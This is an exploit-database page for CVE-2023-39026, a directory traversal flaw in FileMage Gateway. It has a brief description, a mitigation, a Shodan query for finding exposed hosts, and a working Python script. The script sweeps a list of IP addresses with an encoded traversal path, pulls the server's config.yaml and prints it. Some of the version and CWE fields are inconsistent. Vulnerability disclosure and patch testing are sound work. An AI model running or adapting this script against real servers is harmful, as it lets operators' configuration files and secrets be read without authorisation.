FileMage Gateway 1.10.9 - Local File Inclusion

vendor:

FileMage Gateway

by:

Bryce "Raindayzz" Harty

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: FileMage Gateway

Affected Version From: Azure Versions < 1.10.9

Affected Version To: 1.10.2009

Patch Exists: YES

Related CWE: CVE-2023-39026

CPE: cpe:2.3:a:filemage:gateway:1.10.9

Metasploit:

Other Scripts:

Tags: cve,cve2023,lfi,filemage

Nuclei References: https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html, https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/, https://nvd.nist.gov/vuln/detail/CVE-2023-39026

Nuclei Metadata: {'max-request': 1, 'verified': True, 'shodan-query': 'title:"FileMage"'}

Platforms Tested: All Azure deployments < 1.10.9

2023

FileMage Gateway 1.10.9 – Local File Inclusion

The FileMage Gateway version 1.10.9 is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability to include arbitrary files from the server, potentially leading to remote code execution.

Mitigation:

Update to FileMage Gateway version 1.10.9 or later. Restrict access to the vulnerable endpoint and sanitize user input to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty   
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9 
# CVE : CVE-2023-39026

# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html

import requests
import warnings
warnings.filterwarnings("ignore")
def worker(url):
    response = requests.get(url, verify=False, timeout=.5)
    return response
def main():
    listIP = []
    file_path = input("Enter the path to the file containing the IP addresses: ")
    with open(file_path, 'r') as file:
        ip_list = file.read().splitlines()
        searchString = "tls"
        for ip in ip_list:
            url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"
            try:
                response = worker(url)
                #print(response.text)
                if searchString in response.text:
                    print("Vulnerable IP: " + ip)
                    print(response.text)
                    listIP.append(ip)
            except requests.exceptions.RequestException as e:  
                print(f"Error occurred for {ip}: {str(e)}")

    for x in listIP:
        print(x)
if __name__ == '__main__':
    main()